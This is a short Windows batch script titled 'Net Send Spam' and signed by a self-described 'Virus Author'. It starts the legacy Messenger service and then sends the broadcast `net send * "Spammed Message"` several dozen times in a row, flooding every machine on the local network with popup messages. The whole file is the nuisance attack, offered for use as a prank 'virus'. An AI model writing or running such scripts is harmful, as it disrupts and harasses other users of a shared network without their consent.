@ echo off
rem ---------------------------------
rem Net Send Spam
net start "messenger"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
net send * "Spammed Message"
rem ---------------------------------


__-Virus Author: subhojit-__